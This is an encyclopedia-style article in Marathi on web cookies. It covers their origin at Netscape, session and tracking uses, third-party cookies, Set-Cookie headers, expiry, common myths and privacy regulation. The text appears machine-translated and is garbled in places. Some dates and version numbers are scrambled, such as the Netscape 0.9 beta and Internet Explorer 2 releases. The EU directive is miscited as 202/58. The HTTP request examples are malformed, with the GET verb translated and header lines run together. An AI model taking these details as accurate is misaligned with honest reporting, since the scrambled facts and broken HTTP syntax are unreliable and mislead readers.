इंटरनेट कुकी: ते काय आहे? व्याख्या, मूळ, प्रकार आणि गोपनीयता

Un कुकी किंवा वेब कुकी (किंवा कुकी, म्हणून संक्षिप्त साक्षीदार Quebec मध्ये) HTTP सर्व्हरद्वारे HTTP क्लायंटला पाठवलेल्या माहितीचा एक क्रम म्हणून HTTP कम्युनिकेशन प्रोटोकॉलद्वारे परिभाषित केले जाते, जे प्रत्येक वेळी त्याच HTTP सर्व्हरला काही विशिष्ट परिस्थितींमध्ये विचारल्यावर परत मिळते.

कुकी a च्या समतुल्य आहे टर्मिनलवर साठवलेली लहान मजकूर फाइल इंटरनेट वापरकर्त्याचे. 20 वर्षांहून अधिक काळ अस्तित्वात असलेले, ते वेबसाइट विकसकांना त्यांचे नेव्हिगेशन सुलभ करण्यासाठी आणि काही कार्यक्षमतेला अनुमती देण्यासाठी वापरकर्ता डेटा संचयित करण्याची परवानगी देतात. कुकीज नेहमीच कमी-अधिक प्रमाणात वादग्रस्त ठरल्या आहेत कारण त्यामध्ये अवशिष्ट वैयक्तिक माहिती असते ज्याचा तृतीय पक्षांद्वारे संभाव्य शोषण केला जाऊ शकतो.

हे वेब सर्व्हरद्वारे वेब ब्राउझरला HTTP शीर्षलेख म्हणून पाठवले जाते जे प्रत्येक वेळी सर्व्हरवर प्रवेश करतेवेळी ते न बदलता परत करते. कुकी वापरली जाऊ शकते एक प्रमाणीकरण, एक सत्र (राज्य देखभाल), आणि साठी वापरकर्त्याबद्दल विशिष्ट माहिती साठवा, जसे की साइट प्राधान्ये किंवा इलेक्ट्रॉनिक शॉपिंग कार्टची सामग्री. कुकी हा शब्द यातून आला आहे जादूची कुकी, UNIX संगणनातील एक सुप्रसिद्ध संकल्पना, ज्याने ब्राउझर कुकीजची कल्पना आणि नाव प्रेरित केले. कुकीजचे काही पर्याय अस्तित्वात आहेत, प्रत्येकाचे स्वतःचे उपयोग, फायदे आणि तोटे आहेत.

साध्या मजकूर फाइल्स असल्याने, कुकीज एक्झिक्युटेबल नाहीत. ते नाहीयेत स्पायवेअर किंवा व्हायरस नाही, जरी काही साइटवरील कुकीज अनेक अँटी-व्हायरस सॉफ्टवेअरद्वारे शोधल्या जातात कारण ते वापरकर्ते एकाधिक साइट्सला भेट देतात तेव्हा त्यांचा मागोवा घेण्याची परवानगी देतात. 

बहुतेक आधुनिक ब्राउझर वापरकर्त्यांना परवानगी देतात कुकीज स्वीकारायच्या की नाकारायच्या हे ठरवा. वापरकर्ते देखील करू शकतात कुकीज किती काळ साठवल्या जातात ते निवडा. तथापि, कुकीजचा संपूर्ण नकार काही साइट निरुपयोगी बनवते. उदाहरणार्थ, क्रेडेन्शियल्स (वापरकर्तानाव आणि पासवर्ड) वापरून लॉगिन आवश्यक असलेल्या शॉपिंग कार्ट किंवा साइट स्टोअर करा.

हिस्टोरिक

शब्द कुकी इंग्रजी शब्दापासून व्युत्पन्न जादूची कुकी, जे डेटाचे पॅकेट आहे जे प्रोग्राम प्राप्त करतो आणि न बदलता परत करतो. IT मध्ये कुकीज आधीच वापरल्या जात होत्या तेव्हा लू मॉन्टुली वेब कम्युनिकेशन्समध्ये त्यांचा वापर करण्याची कल्पना होती जून 1994 मध्ये. त्या वेळी, तो नेटस्केप कम्युनिकेशन्समध्ये कार्यरत होता, ज्याने क्लायंटसाठी ई-कॉमर्स अॅप्लिकेशन विकसित केले होते. कुकीजने स्टोअरच्या व्हर्च्युअल शॉपिंग कार्ट अंमलबजावणीच्या विश्वासार्हतेच्या समस्येचे निराकरण केले.

त्याच वर्षी जॉन जिआनान्ड्रिया आणि लू मॉन्टुली यांनी नेटस्केपचे पहिले कुकी तपशील लिहिले. मोझॅक नेटस्केपची 0.9 बीटा आवृत्ती, 13 ऑक्टोबर 1994 रोजी रिलीज झाली, एकात्मिक कुकी तंत्रज्ञान (पोस्ट पहा). कुकीजचा पहिला (नॉन-प्रायोगिक) वापर नेटस्केप वेबसाइटच्या अभ्यागतांनी यापूर्वी साइटला भेट दिली होती की नाही हे निर्धारित करण्यासाठी होते. मोंटुली यांनी 1995 मध्ये कुकी तंत्रज्ञानासाठी पेटंट अर्ज दाखल केला आणि यूएस पेटंट 5774670 मंजूर करण्यात आले. 1998 मध्ये मंजूर.

0.9 मध्ये नेटस्केप 1994 बीटामध्ये लागू केल्यानंतर, ऑक्टोबर 2 मध्ये प्रसिद्ध झालेल्या इंटरनेट एक्सप्लोरर 1995 मध्ये कुकीज एकत्रित केल्या गेल्या.

कुकीजचा परिचय अद्याप लोकांना व्यापकपणे ज्ञात नाही. विशेषतः, ब्राउझर सेटिंग्जमध्ये डीफॉल्टनुसार कुकीज स्वीकारल्या गेल्या आणि वापरकर्त्यांना त्यांच्या उपस्थितीबद्दल माहिती दिली गेली नाही. काही लोकांना 1995 च्या पहिल्या तिमाहीत कुकीजच्या अस्तित्वाची जाणीव होती, परंतु 12 फेब्रुवारी 1996 रोजी फायनान्शिअल टाईम्सने एक लेख प्रकाशित केल्यानंतरच सामान्य जनतेने त्यांचे अस्तित्व लक्षात घेतले. त्याच वर्षी कुकीजकडे मीडियाचे बरेच लक्ष वेधले गेले. गोपनीयतेच्या संभाव्य घुसखोरीमुळे. 1996 आणि 1997 मध्ये अमेरिकन फेडरल ट्रेड कमिशनच्या दोन सल्लामसलतांमध्ये कुकीजच्या विषयावर चर्चा झाली.

अधिकृत कुकी स्पेसिफिकेशनचा विकास आधीच सुरू होता. www-talk मेलिंग लिस्टवर एप्रिल 1995 मध्ये अधिकृत तपशीलाची पहिली चर्चा झाली. एक विशेष IETF कार्यरत गट तयार करण्यात आला. एचटीटीपी व्यवहारांमध्ये राज्याची ओळख करून देण्याचे दोन पर्यायी प्रस्ताव अनुक्रमे ब्रायन बेहलेनडॉर्फ आणि डेव्हिड क्रिस्टोल यांनी मांडले होते, परंतु स्वत: क्रिस्टोलच्या नेतृत्वाखालील गटाने नेटस्केपचे तपशील प्रारंभ बिंदू म्हणून वापरण्याचा निर्णय घेतला. फेब्रुवारी 1996 मध्ये, कार्य गटाने निर्धारित केले की तृतीय पक्ष कुकीज गोपनीयतेसाठी एक महत्त्वपूर्ण धोका आहे. गटाने उत्पादित केलेले तपशील अखेरीस म्हणून प्रकाशित केले गेले आरएफसी 2109.

2014 च्या शेवटी, आम्हाला अनेक साइट्सवर कुकीजबद्दल बॅनर दिसतो. किमान एक ब्राउझर विस्तार आहे जो अनुमती देतो बॅनर प्रदर्शित नाही.

कुकीजचे प्रकार आणि वापर

सत्र व्यवस्थापन

नेव्हिगेशन दरम्यान वापरकर्ता डेटा राखण्यासाठी कुकीज वापरल्या जाऊ शकतात, परंतु एकाधिक भेटींमध्ये देखील. इलेक्ट्रॉनिक शॉपिंग कार्ट्सची अंमलबजावणी करण्याचे साधन प्रदान करण्यासाठी कुकीज सादर केल्या गेल्या, एक आभासी उपकरण ज्यामध्ये वापरकर्ता साइट ब्राउझ करताना त्याला खरेदी करू इच्छित असलेल्या वस्तू जमा करू शकतो.

आजकाल, शॉपिंग कार्टसारखे अॅप्स सर्व्हरवर डेटाबेसमध्ये आयटमची सूची संग्रहित करतात, जे श्रेयस्कर आहे; कुकीमध्येच सेव्ह करण्यापेक्षा. वेब सर्व्हर एक अद्वितीय सत्र आयडी असलेली कुकी पाठवतो. त्यानंतरच्या प्रत्येक विनंतीवर वेब ब्राउझर हा सत्र आयडी परत करतो आणि बास्केटमधील आयटम सेव्ह केले जातात आणि त्याच युनिक सेशन आयडीशी संबंधित असतात.

क्रेडेन्शियल्स वापरून साइटवर लॉग इन करण्यासाठी कुकीजचा वारंवार वापर उपयुक्त आहे. थोडक्यात, वेब सर्व्हर प्रथम एक अद्वितीय सत्र आयडी असलेली कुकी पाठवतो. नंतर वापरकर्ते त्यांची क्रेडेन्शियल्स (सामान्यतः वापरकर्तानाव आणि पासवर्ड) प्रदान करतात. वेब ऍप्लिकेशन नंतर सत्र प्रमाणीकृत करते आणि वापरकर्त्यास सेवेमध्ये प्रवेश करण्यास अनुमती देते.

वैयक्तिकरण

कुकीजचा वापर साइटच्या वापरकर्त्याची माहिती लक्षात ठेवण्यासाठी, भविष्यात त्याला योग्य सामग्री दर्शविण्यासाठी केला जाऊ शकतो. उदाहरणार्थ, वेब सर्व्हर त्या वेबसाइटवर लॉग इन करण्यासाठी वापरलेले शेवटचे वापरकर्तानाव असलेली कुकी पाठवू शकतो, जेणेकरुन भविष्यातील भेटींमध्ये वापरकर्तानाव प्री-पॉप्युलेट करता येईल.

अनेक वेबसाइट्स वापरकर्त्याच्या पसंतींवर आधारित वैयक्तिकरणासाठी कुकीज वापरतात. वापरकर्ते त्यांची प्राधान्ये एका फॉर्ममध्ये निवडतात आणि ती सर्व्हरवर सबमिट करतात. सर्व्हर कुकीमध्ये प्राधान्ये एन्कोड करतो आणि ब्राउझरला परत पाठवतो. त्यानंतर, प्रत्येक वेळी वापरकर्ता या साइटच्या पृष्ठावर प्रवेश करतो तेव्हा, ब्राउझर कुकी आणि म्हणून प्राधान्यांची सूची परत करतो; सर्व्हर नंतर वापरकर्त्याच्या पसंतीनुसार पृष्ठ सानुकूलित करू शकतो. उदाहरणार्थ, विकिपीडिया वेबसाइट तिच्या वापरकर्त्यांना त्यांच्या पसंतीच्या साइटची त्वचा निवडण्याची परवानगी देते. Google शोध इंजिन त्याच्या वापरकर्त्यांना (जरी ते नोंदणीकृत नसले तरीही) त्यांना प्रत्येक परिणाम पृष्ठावर पाहू इच्छित परिणामांची संख्या निवडण्याची परवानगी देते.

ट्रॅकिंग

इंटरनेट वापरकर्त्यांच्या ब्राउझिंग सवयींचा मागोवा घेण्यासाठी ट्रॅकिंग कुकीज वापरल्या जातात. हे काही प्रमाणात संगणकाच्या IP पत्त्याचा वापर करून पृष्ठासाठी विनंती करून किंवा क्लायंट प्रत्येक विनंतीसह पाठवणारे 'रेफरर' HTTP शीर्षलेख वापरून देखील केले जाऊ शकते, परंतु कुकीज अधिक अचूकतेसाठी परवानगी देतात. हे खालील उदाहरणाप्रमाणे केले जाऊ शकते:

1. जर वापरकर्त्याने साइटवर एखादे पृष्ठ कॉल केले आणि विनंतीमध्ये कुकी नसेल, तर सर्व्हर असे गृहीत धरतो की वापरकर्त्याने भेट दिलेले हे पहिले पृष्ठ आहे. सर्व्हर नंतर एक यादृच्छिक स्ट्रिंग तयार करतो आणि विनंती केलेल्या पृष्ठासह ब्राउझरला पाठवतो.
2. या क्षणापासून, प्रत्येक वेळी साइटचे नवीन पृष्ठ कॉल केल्यावर ब्राउझरद्वारे कुकी स्वयंचलितपणे पाठविली जाईल. सर्व्हर नेहमीप्रमाणे पृष्ठ पाठवेल, परंतु लॉग फाइलमध्ये कॉल केलेल्या पृष्ठाची URL, विनंतीची तारीख, वेळ आणि कुकी देखील लॉग करेल.

लॉग फाइल पाहून, वापरकर्त्याने कोणती पृष्ठे आणि कोणत्या क्रमाने भेट दिली हे पाहणे शक्य आहे. उदाहरणार्थ, जर फाइलमध्ये id=abc कुकी वापरून केलेल्या काही विनंत्या असतील, तर या सर्व विनंत्या एकाच वापरकर्त्याकडून आल्याचे प्रस्थापित होऊ शकते. विनंती केलेली URL, विनंतीशी संबंधित तारीख आणि वेळ वापरकर्त्याच्या ब्राउझिंगचा मागोवा घेण्यास अनुमती देतात.

थर्ड-पार्टी कुकीज आणि वेब बीकन्स, खाली स्पष्ट केले आहेत, याव्यतिरिक्त विविध साइटवर ट्रॅकिंग सक्षम करतात. सिंगल साइट ट्रॅकिंगचा वापर सामान्यतः सांख्यिकीय हेतूंसाठी केला जातो. याउलट, थर्ड पार्टी कुकीज वापरून वेगवेगळ्या साइट्सचा मागोवा घेणे साधारणपणे जाहिरात कंपन्यांद्वारे अनामित वापरकर्ता प्रोफाइल तयार करण्यासाठी वापरले जाते (जे नंतर वापरकर्त्याला कोणत्या जाहिराती दाखवायच्या हे निर्धारित करण्यासाठी तसेच त्याला या जाहिरातींशी संबंधित ईमेल पाठवण्यासाठी वापरतात — स्पॅम ).

कुकीजचा मागोवा घेणे वापरकर्त्याच्या गोपनीयतेवर आक्रमण करण्याचा धोका आहे परंतु त्या सहजपणे हटवल्या जाऊ शकतात. बर्‍याच आधुनिक ब्राउझरमध्ये ऍप्लिकेशन बंद करताना सततच्या कुकीज स्वयंचलितपणे हटविण्याचा पर्याय समाविष्ट असतो.

तृतीय पक्ष कुकीज

वेब पृष्ठामध्ये समाविष्ट असलेल्या प्रतिमा आणि इतर वस्तू पृष्ठ होस्ट करणाऱ्या सर्व्हरपेक्षा वेगळ्या सर्व्हरवर असू शकतात. पृष्ठ प्रदर्शित करण्यासाठी, ब्राउझर हे सर्व ऑब्जेक्ट डाउनलोड करतो. बर्‍याच वेबसाइट्समध्ये वेगवेगळ्या स्त्रोतांकडून माहिती असते. उदाहरणार्थ, तुम्ही तुमच्या ब्राउझरमध्ये www.example.com टाइप केल्यास, पृष्ठाच्या भागावर अनेकदा वस्तू किंवा जाहिराती असतील ज्या वेगवेगळ्या स्त्रोतांकडून येतात, म्हणजे www. .example.com पेक्षा वेगळ्या डोमेनवरून. "प्रथम" पक्ष कुकीज ब्राउझरच्या अॅड्रेस बारमध्ये सूचीबद्ध केलेल्या डोमेनद्वारे सेट केलेल्या कुकीज असतात. तृतीय-पक्ष कुकीज भिन्न डोमेनवरून आलेल्या पृष्ठ ऑब्जेक्ट्सपैकी एकाद्वारे सेट केल्या जातात.

डीफॉल्टनुसार, Mozilla Firefox, Microsoft Internet Explorer आणि Opera सारखे ब्राउझर थर्ड-पार्टी कुकीज स्वीकारतात, परंतु वापरकर्ते त्यांना ब्लॉक करण्यासाठी ब्राउझर पर्यायांमध्ये सेटिंग्ज बदलू शकतात. वेब कार्यक्षमता सक्षम करणार्‍या तृतीय-पक्ष कुकीजमध्ये कोणताही सुरक्षितता धोका नाही, तथापि त्यांचा वापर वापरकर्त्यांचा मागोवा घेण्यासाठी देखील केला जातो. साइटवरून साइटवर.

Google Chrome सह सर्व ब्राउझरसाठी उपलब्ध Ghostery सारखी साधने तृतीय पक्षांमधील देवाणघेवाण अवरोधित करू शकतात.

अंमलबजावणी

कुकीज हे वेब सर्व्हरद्वारे ब्राउझरला पाठवलेल्या डेटाचे छोटे तुकडे असतात. ब्राउझर त्यांना सर्व्हरवर न बदलता परत करतो, अन्यथा स्टेटलेस HTTP व्यवहारात स्थिती (मागील घटनांची मेमरी) सादर करतो. कुकीजशिवाय, वेब पृष्ठाची प्रत्येक पुनर्प्राप्ती किंवा वेब पृष्ठाचा घटक हा एक वेगळा कार्यक्रम असतो, त्याच साइटवर केलेल्या इतर विनंत्यांपेक्षा स्वतंत्र. वेब सर्व्हरद्वारे सेट करण्यास सक्षम असण्याव्यतिरिक्त, ब्राउझरद्वारे समर्थित आणि अधिकृत असल्यास, JavaScript सारख्या स्क्रिप्टिंग भाषांद्वारे कुकीज देखील सेट केल्या जाऊ शकतात.

अधिकृत कुकी स्पेसिफिकेशन असे सूचित करते की ब्राउझर कमीतकमी कुकीज सेव्ह आणि पुन्हा पाठवण्यास सक्षम असावेत. विशेषत:, ब्राउझर प्रत्येकी चार किलोबाइट्सच्या किमान 300 कुकीज आणि एका सर्व्हर किंवा डोमेनसाठी किमान 20 कुकीज संचयित करण्यास सक्षम असावे.

च्या कलम 3.1 नुसार आरएफसी 2965, कुकी नावे केस-संवेदनशील आहेत.

कुकी त्याच्या कालबाह्यतेची तारीख निर्दिष्ट करू शकते, अशा परिस्थितीत या तारखेला कुकी हटविली जाईल. जर कुकीने कालबाह्यता तारीख निर्दिष्ट केली नसेल, तर वापरकर्त्याने ब्राउझर सोडताच कुकी हटविली जाते. म्हणून, कालबाह्यता तारीख निर्दिष्ट करणे हा कुकीला एकाधिक सत्रांमध्ये टिकून ठेवण्याचा एक मार्ग आहे. या कारणास्तव, कालबाह्यता तारखेसह कुकीज असल्याचे म्हटले जाते सक्तीचे. एक उदाहरण ऍप्लिकेशन: वापरकर्त्यांनी त्यांच्या शॉपिंग कार्टमध्ये ठेवलेल्या आयटमची नोंद करण्यासाठी किरकोळ साइट सतत कुकीज वापरू शकते (वास्तविक, कुकी विक्रीच्या साइटवरील डेटाबेसमध्ये सेव्ह केलेल्या एंट्रीचा संदर्भ घेऊ शकते, आणि तुमच्या संगणकावर नाही) . याद्वारे, जर वापरकर्ते खरेदी न करता त्यांचे ब्राउझर सोडले आणि नंतर त्यावर परत आले, तर ते कार्टमधील आयटम पुन्हा शोधण्यात सक्षम होतील. जर या कुकीजने कालबाह्यता तारीख दिली नाही, तर ब्राउझर बंद झाल्यावर ते कालबाह्य होतील आणि बास्केटमधील सामग्रीची माहिती गमावली जाईल.

कुकीज तयार केलेल्या सर्व्हरवरील विशिष्ट डोमेन, सबडोमेन किंवा पाथपर्यंत मर्यादित असू शकतात.

कुकीची निर्मिती

वेब पृष्ठांचे हस्तांतरण हायपरटेक्स्ट ट्रान्सफर प्रोटोकॉल (HTTP) वापरून केले जाते. कुकीजकडे दुर्लक्ष करून, ब्राउझर वेब सर्व्हरवरून पृष्ठ कॉल करतात त्यांना साधारणपणे एक छोटा मजकूर पाठवून HTTP विनंती. उदाहरणार्थ, www.example.org/index.html पृष्‍ठावर प्रवेश करण्‍यासाठी, ब्राउझर www.example.org सर्व्हरशी कनेक्‍ट करतात आणि यासारखे दिसणारी विनंती पाठवतात:

	/index.html HTTP/1.1होस्ट मिळवा: www.example.org
नॅव्हिगेटर	→	सर्व्हर

सर्व्हर विनंती केलेले पृष्ठ पाठवून प्रतिसाद देतो, त्याच्या आधी एक समान मजकूर, संपूर्ण कॉल केला जात आहे HTTP प्रतिसाद. या पॅकेटमध्ये ब्राउझरला कुकीज संचयित करण्यासाठी निर्देश देणाऱ्या ओळी असू शकतात:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML पृष्ठ)
नॅव्हिगेटर	←	सर्व्हर

जर सर्व्हरला ब्राउझरने कुकी साठवायची असेल तरच सर्व्हर सेट-कुकी लाइन पाठवतो. Set-Cookie ही ब्राउझरसाठी name=value स्ट्रिंग साठवून सर्व्हरला भविष्यातील सर्व विनंत्यांमध्ये परत करण्याची विनंती आहे. जर ब्राउझर कुकीजला सपोर्ट करत असेल आणि ब्राउझर पर्यायांमध्ये कुकीज सक्षम केल्या असतील, तर त्याच सर्व्हरला केलेल्या त्यानंतरच्या सर्व विनंत्यांमध्ये कुकीचा समावेश केला जाईल. उदाहरणार्थ, सर्व्हर www.example.org वर खालील विनंती पाठवून ब्राउझर www.example.org/news.html पृष्ठावर कॉल करतो:

	/news.html HTTP/1.1होस्ट मिळवा: www.example.orgCookie: name=valueAccept: */*
नॅव्हिगेटर	→	सर्व्हर

ही त्याच सर्व्हरवरील दुसर्‍या पृष्ठासाठी विनंती आहे आणि वरील पहिल्यापेक्षा वेगळी आहे कारण त्यामध्ये सर्व्हरने पूर्वी ब्राउझरला पाठविलेली स्ट्रिंग आहे. याचा अर्थ, सर्व्हरला माहित आहे की ही विनंती मागील एकाशी जोडलेली आहे. सर्व्हर कॉल केलेले पृष्ठ पाठवून आणि त्यात इतर कुकीज जोडून प्रतिसाद देतो.

कुकीचे मूल्य सर्व्हरद्वारे कॉल केलेल्या पृष्ठास प्रतिसाद म्हणून सेट-कुकी: name=new_value ही नवीन ओळ पाठवून बदलले जाऊ शकते. ब्राउझर नंतर जुने मूल्य नवीनसह बदलतो.

सेट-कुकी लाइन सहसा सीजीआय प्रोग्राम किंवा इतर स्क्रिप्टिंग भाषेद्वारे तयार केली जाते, HTTP सर्व्हरद्वारे नाही. HTTP सर्व्हर (उदाहरण: Apache) केवळ प्रोग्रामचा परिणाम (कुकीज असलेल्या शीर्षलेखाच्या आधी असलेला दस्तऐवज) ब्राउझरवर प्रसारित करेल.

कुकीज JavaScript किंवा ब्राउझरमध्ये चालणार्‍या इतर तत्सम भाषांद्वारे देखील सेट केल्या जाऊ शकतात, म्हणजे सर्व्हरच्या बाजूऐवजी क्लायंटच्या बाजूने. JavaScript मध्ये, document.cookie ऑब्जेक्ट या उद्देशासाठी वापरला जातो. उदाहरणार्थ, स्टेटमेंट document.cookie = "temperature=20" "temperature" नावाची आणि 20 च्या मूल्यासह कुकी तयार करते.

कुकीचे गुणधर्म

नाव/मूल्य जोडी व्यतिरिक्त, कुकीमध्ये कालबाह्यता तारीख, पथ, डोमेन नाव आणि इच्छित कनेक्शनचा प्रकार, म्हणजे सामान्य किंवा कूटबद्ध देखील असू शकतो. RFC 2965 हे देखील परिभाषित करते की कुकीजमध्ये अनिवार्य आवृत्ती क्रमांक असणे आवश्यक आहे, परंतु हे सहसा वगळले जाते. हे डेटा भाग name=new_value जोडीचे अनुसरण करतात आणि अर्धविरामांनी वेगळे केले जातात. उदाहरणार्थ, सेट-कुकी लाइन पाठवून सर्व्हरद्वारे कुकी तयार केली जाऊ शकते: name=new_value; कालबाह्य = तारीख; मार्ग =/; domain=.example.org.

कुकीची कालबाह्यता

कुकीज कालबाह्य होतात आणि नंतर खालील परिस्थितींमध्ये ब्राउझरद्वारे सर्व्हरवर पाठवल्या जात नाहीत:

• ब्राउझर बंद असताना, कुकी कायम नसल्यास.
• जेव्हा कुकीची कालबाह्यता तारीख निघून जाते.
• जेव्हा कुकी कालबाह्यता तारीख (सर्व्हर किंवा स्क्रिप्टद्वारे) भूतकाळातील तारखेमध्ये बदलली जाते.
• जेव्हा ब्राउझर वापरकर्त्याच्या विनंतीनुसार कुकी हटवतो.

तिसरी परिस्थिती सर्व्हर किंवा स्क्रिप्ट्सना कुकी स्पष्टपणे हटवण्याची परवानगी देते. लक्षात ठेवा Google Chrome वेब ब्राउझरद्वारे सामग्री सेटिंग्जमध्ये प्रवेश करून विशिष्ट कुकीची कालबाह्यता तारीख जाणून घेणे शक्य आहे. संगणकावर जतन केलेली कुकी पुसून टाकण्यासाठी कोणतीही प्रक्रिया न केल्यास ती अनेक दशके तेथेच राहू शकते.

स्टिरियोटाइप

इंटरनेटवर त्यांचा परिचय झाल्यापासून, कुकीजबद्दलच्या अनेक कल्पना इंटरनेटवर आणि माध्यमांमध्ये पसरल्या आहेत. 1998 मध्ये, CIAC, युनायटेड स्टेट्स डिपार्टमेंट ऑफ एनर्जी कॉम्प्यूटर इव्हेंट मॉनिटरींग टीमने ठरवले की कुकी सुरक्षा भेद्यता "मूलत: अस्तित्वात नाही" आणि स्पष्ट केले की "तुमच्या भेटींच्या मूळ आणि तुम्ही भेट दिलेल्या वेब पृष्ठांचे तपशील. वेब सर्व्हरच्या लॉग फाइल्समध्ये आधीपासूनच अस्तित्वात आहे. 2005 मध्ये, ज्युपिटर रिसर्चने एका अभ्यासाचे परिणाम प्रकाशित केले, ज्यामध्ये उत्तरदात्यांपैकी लक्षणीय टक्केवारीने खालील विधाने विचारात घेतली:

• कुकीज सारख्या आहेत व्हायरस, ते वापरकर्त्यांच्या हार्ड ड्राइव्हला संक्रमित करतात.
• कुकीज तयार होतात पॉप-अप.
• कुकीज पाठवण्यासाठी वापरल्या जातात स्पॅम.
• कुकीज फक्त जाहिरातींसाठी वापरल्या जातात.

कुकीज वापरकर्त्याच्या संगणकावरील माहिती पुसून किंवा वाचू शकत नाहीत. तथापि, कुकीज दिलेल्या साइटवर किंवा साइटच्या सेटवर वापरकर्त्याने भेट दिलेली वेब पृष्ठे शोधणे शक्य करतात. ही माहिती वापरकर्ता प्रोफाइलमध्ये संकलित केली जाऊ शकते जी तृतीय पक्षांना वापरली किंवा पुनर्विक्री केली जाऊ शकते, ज्यामुळे गंभीर गोपनीयता समस्या उद्भवू शकतात. काही प्रोफाइल निनावी असतात, या अर्थाने त्यामध्ये कोणतीही वैयक्तिक माहिती नसते, तरीही अशा प्रोफाइलवर शंका येऊ शकते.

त्याच अभ्यासानुसार, इंटरनेट वापरकर्त्यांच्या मोठ्या टक्केवारीला कुकीज कशा हटवायच्या हे माहित नाही. लोक कुकीजवर विश्वास ठेवत नाहीत याचे एक कारण म्हणजे काही साइट्सनी कुकीजच्या वैयक्तिकरित्या ओळखल्या जाणार्‍या पैलूचा गैरवापर केला आहे आणि ही माहिती इतर स्त्रोतांसह सामायिक केली आहे. लक्ष्यित जाहिराती आणि अवांछित ईमेलची एक मोठी टक्केवारी, ज्याला स्पॅम मानले जाते, कुकीजचा मागोवा घेत असलेल्या माहितीमधून येतो.

ब्राउझर सेटिंग्ज

बहुतेक ब्राउझर कुकीजला समर्थन देतात आणि वापरकर्त्याला त्या अक्षम करण्याची परवानगी देतात. सर्वात सामान्य पर्याय आहेत:

• कुकीज पूर्णपणे सक्षम किंवा अक्षम करा, जेणेकरून ते सतत स्वीकारले जातील किंवा अवरोधित केले जातील.
• ब्राउझरच्या अॅड्रेस बारमध्ये javascript: alert(document.cookie) प्रविष्ट करून वापरकर्त्याला दिलेल्या पृष्ठावरील सक्रिय कुकीज पाहण्याची परवानगी द्या. काही ब्राउझर वापरकर्त्यासाठी कुकी व्यवस्थापक समाविष्ट करतात जे सध्या ब्राउझरद्वारे संचयित केलेल्या कुकीज पाहू आणि हटवू शकतात.

बहुतेक ब्राउझर वैयक्तिक डेटा पूर्णपणे हटविण्याची परवानगी देतात ज्यात कुकीज समाविष्ट असतात. कुकी परवानग्या नियंत्रित करण्यासाठी अतिरिक्त मॉड्यूल देखील अस्तित्वात आहेत.

गोपनीयता आणि तृतीय-पक्ष कुकीज

या काल्पनिक उदाहरणात, एका जाहिरात कंपनीने दोन वेबसाइटवर बॅनर लावले आहेत. त्याच्या सर्व्हरवर बॅनर होस्ट करून आणि तृतीय पक्ष कुकीज वापरून, जाहिरात कंपनी या दोन साइटद्वारे वापरकर्त्याच्या नेव्हिगेशनचा मागोवा घेण्यास सक्षम आहे.

वेब वापरकर्त्यांच्या गोपनीयतेसाठी आणि निनावीपणासाठी कुकीजचे महत्त्वपूर्ण परिणाम आहेत. कुकीज फक्त त्यांना सेट केलेल्या सर्व्हरवर किंवा त्याच इंटरनेट डोमेनशी संबंधित असलेल्या सर्व्हरवर परत पाठवल्या जात असल्या तरी, वेब पृष्ठामध्ये इतर डोमेनशी संबंधित असलेल्या सर्व्हरवर संग्रहित प्रतिमा किंवा इतर घटक असू शकतात. या बाह्य घटकांच्या पुनर्प्राप्ती दरम्यान सेट केलेल्या कुकीज म्हणतात तृतीय पक्ष कुकीज. यामध्ये अवांछित पॉप-अप विंडोमधील कुकीज समाविष्ट आहेत.

जाहिरात कंपन्या वापरकर्त्यांना भेट देत असलेल्या विविध साइटवर ट्रॅक ठेवण्यासाठी तृतीय पक्ष कुकीज वापरतात. विशेषतः, जाहिरात कंपनी वापरकर्त्याचा त्या सर्व पृष्ठांवर मागोवा घेऊ शकते जिथे तिने जाहिरात प्रतिमा किंवा ट्रॅकिंग पिक्सेल ठेवला आहे. वापरकर्त्याने भेट दिलेल्या पृष्ठांचे ज्ञान जाहिरात कंपनीला वापरकर्त्याच्या जाहिरात प्राधान्यांना लक्ष्य करण्यास अनुमती देते.

वापरकर्ता प्रोफाइल तयार करण्याची क्षमता काही लोक गोपनीयतेचे आक्रमण मानतात, विशेषतः जेव्हा तृतीय पक्ष कुकीज वापरून वेगवेगळ्या डोमेनवर ट्रॅकिंग केले जाते. या कारणास्तव, काही देशांमध्ये कुकी कायदे आहेत.

युनायटेड स्टेट्स सरकारने 2000 मध्ये कुकीजच्या प्लेसमेंटवर कठोर नियम लागू केले होते, हे उघड झाल्यानंतर व्हाईट हाऊस ड्रग पॉलिसी ऑफिस ऑनलाइन ड्रग जाहिराती पाहणाऱ्या वापरकर्त्यांच्या संगणकांचा मागोवा घेण्यासाठी कुकीज वापरत होते. 2002 मध्ये, गोपनीयता कार्यकर्ता डॅनियल ब्रँड्ट यांनी शोधून काढले की सीआयएने त्यांच्या वेबसाइटला भेट दिलेल्या संगणकांवर सतत कुकीज सोडल्या. एकदा या उल्लंघनाची माहिती मिळाल्यावर, सीआयएने घोषित केले की या कुकीज हेतुपुरस्सर पाठवल्या गेल्या नाहीत आणि त्या सेट करणे थांबवले. 25 डिसेंबर 2005 रोजी, ब्रॅंडला आढळले की राष्ट्रीय सुरक्षा एजन्सी (NSA) ने सॉफ्टवेअर अपडेटमुळे अभ्यागतांच्या संगणकांवर दोन सतत कुकीज सोडल्या आहेत. सूचित केल्यानंतर, NSA ने लगेच कुकीज अक्षम केल्या.

युनायटेड किंगडममध्ये, द कुकी कायदा “, 25 मे, 2012 रोजी अंमलात आले, साइट्सना त्यांचे हेतू घोषित करण्यास बाध्य करते, अशा प्रकारे वापरकर्त्यांना ते निवडण्याची अनुमती देते की त्यांना इंटरनेटवर त्यांचा रस्ता सोडायचा आहे की नाही. अशा प्रकारे ते जाहिरातींच्या लक्ष्यीकरणापासून संरक्षित केले जाऊ शकतात. तथापि, त्यानुसार पालक, इंटरनेट वापरकर्त्यांची संमती स्पष्टपणे आवश्यक नाही; वापरकर्त्याच्या संमतीच्या अटींमध्ये बदल केले आहेत, ते बनवून अशा प्रकारे निहित.

गोपनीयतेवर 2002/58 निर्देश

डायरेक्टिव्ह 202/58 गोपनीयता आणि इलेक्ट्रॉनिक संप्रेषण, कुकीजच्या वापरावरील नियम समाविष्टीत आहे. विशेषतः, लेख 5, या निर्देशाचा परिच्छेद 3 आवश्यक आहे की वापरकर्त्याच्या संगणकात डेटा (जसे की कुकीज) संचयित करणे केवळ तेव्हाच केले जाऊ शकते जेव्हा:

• वापरकर्त्याला डेटा कसा वापरला जातो याची माहिती दिली जाते;
• वापरकर्त्याला हे स्टोरेज ऑपरेशन नाकारण्याचा पर्याय दिला जातो. तथापि, या लेखात असेही म्हटले आहे की तांत्रिक कारणास्तव डेटा संचयनास या कायद्यातून सूट देण्यात आली आहे.

